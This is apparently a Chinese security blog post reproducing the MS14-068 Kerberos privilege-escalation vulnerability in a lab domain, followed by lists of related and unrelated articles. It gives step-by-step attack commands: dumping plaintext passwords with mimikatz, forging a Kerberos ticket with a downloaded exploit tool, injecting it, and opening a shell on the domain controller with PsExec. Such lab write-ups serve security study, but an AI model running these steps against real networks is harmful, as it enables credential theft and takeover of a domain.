目录

漏洞原理

漏洞复现


目标:普通域成员——>域管理员

漏洞利用前提

  1. 域控没有打MS14-068的补丁(KB3011780)
  2. 拿下一台加入域的计算机
  3. 有这台域内计算机的域用户密码和Sid

漏洞原理

Kerberos 域用户提权漏洞(MS14-068,CVE-2014-6324),所有 Windows 服务器都会受到该漏洞影响。包括 Windows Server 2003、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012 和 Windows Server 2012 R2。

如果攻击者获取了域内一台计算机的 shell 权限,同时知道该域用户的用户名、SID、密码,如果存在该漏洞即可获取域管理员权限。

在kerberos 协议中 ——> Kerberos 认证,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。ms14-068 漏洞就是 经过身份验证的Client在TGT中伪造高权限的PAC。该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。微软给出的补丁号kb3011780。

漏洞复现

环境:

  • win2012(192.168.10.2) 域控,开启了防火墙
  • win7(192.168.10.5),域成员

1. win7获取域账户的密码及sid值

win7机器上查看域管理员,可发现,并没有自己

这里使用mimikatz去抓取域用户的明文密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit > 1.txt

通过以上信息收集我们获取了

  • 域用户:yuwin7
  • 域用户密码:yuwin7.com
  • sid:xxxx
  • 域名:test.lab
  • 域控ip:192.168.10.2

2. 利用ms14-068.exe 工具生成伪造的kerberos协议认证证书

工具:https://codeload.github.com/ianxtianxt/MS14-068/zip/refs/heads/master

 ms-14-068.exe -u   域用户@域名  -p 域用户密码 -s 域用户sid -d 域控ip

生成了证书:TGT_yuwin7@test.lab.ccache

3.  利用mimikatz.exe将证书写入,从而提升为域管理员

kerberos::ptc 证书名字

4. 使用PsExec.exe以管理员权限运行连接域控

psexec64.exe \\域控ip cmd.exe -accepteula

Ps:域管理员与域控建立ipc连接不需要输入用户密码。普通域用户则需要

域内提权之MS14-068相关推荐

  1. 【安全漏洞】CVE-2021-42287CVE-2021-42278 域内提权

    前言 网络安全技术学习,承认⾃⼰的弱点不是丑事.只有对原理了然于⼼,才能突破更多的限制.拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板.知识⾯,决定看到的攻击⾯有多⼴:知识 ...

  2. CVE-2021-42287、CVE-2021-42278域内提权漏洞

    目录 影响范围 漏洞介绍 测试环境 漏洞复现 使用sam-the-admin.py 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE- ...

  3. (环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞

     0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间.域与域控之间.域DC与跨域DC之间 ...

  4. 网络攻防|CVE-2021-42287、CVE-2021-42278域内提权

    作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x01 漏洞原理 Microsoft Windows Active Directory 域服务权限提升漏 ...

  5. 内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)

    简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来.该漏洞也称为"Z ...

  6. [内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)

    简介 CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD ...

  7. 【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝

    文章目录 章节点 横向移动-系统漏洞-CVE-2017-0146(永恒之蓝) 影响版本 插件检测-横向移动 CS联动MSF-检测&利用 横向移动-域控提权-CVE-2014-6324 横向移动 ...

  8. 内网安全——域控提权-CVE-2020-1472NTLM中继攻击

    目录 (一)横向移动-域控提权-CVE-2020-1472 0x01 漏洞原理 0x02 利用过程 重置密码: 恢复密码:

  9. 域控 批量导入 用户_kerberos域用户提权分析

    2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响.该漏洞允许攻击者将域内任意用户权限,提升到域管理员级 ...

最新文章

  1. 二分查找法、顺序查找法
  2. nginx能访问html静态文件但无法访问php文件
  3. 断路器(CircuitBreaker)设计模式
  4. 最基础的Python的socket编程入门教程
  5. Quartz.NET开源作业调度框架系列(五):AdoJobStore保存job到数据库
  6. 解决办法:access restriction is not accessible due to restriction
  7. JAVA零为扩展_与Java的初遇——数据类型扩展
  8. python做单因素方差分析
  9. [转]Netlog 的数据库及 LAMP 架构
  10. java构造函数注释_@Autowired的使用:推荐对构造函数进行注释
  11. python运动目标检测_运动目标检测(3)—光流法
  12. ANSYS Electromagnetics Suite 2022 R2 软件下载与安装教程
  13. Maven配置文件示例
  14. word如何批量更改公式字体
  15. 吴恩达深度学习课程值不值得学?四晚学完的高手给你建议
  16. 暗影格斗3服务器响应比预期,暗影格斗3代码问题导致无法正常游戏
  17. 概念介绍:POE供电交换机、tcpip模型、OSI七层模型、路由协议、网关、访问列表(待整理)...
  18. linux切换网口,linux多网口绑定
  19. Vue指令之v-for的使用
  20. 如何判断Android app退后台、进前台

热门文章

  1. 【React】redux和React-redux
  2. 让thinkpad更安静——控制风扇转速,解决tpfancontrol导致的关机、重启、黑屏
  3. cf战队服务器人员位置,2019年汉宫俱乐部穿越火线分部人员名单公布
  4. 计算机算log的原理,卡西欧计算器怎么算log1.082(1.0 – 手机爱问
  5. jsoup api 用法
  6. 浏览器还可以这么玩哈哈
  7. 系统定制修改之修改 chrome 浏览器默认主页为指定网址
  8. Win11找不到本地用户和组怎么办?
  9. 为什么我在领英上搜到的客户都是显示领英会员(Linkedin Member)?
  10. 亚马逊 S3 下载当前文件夹下的所有内容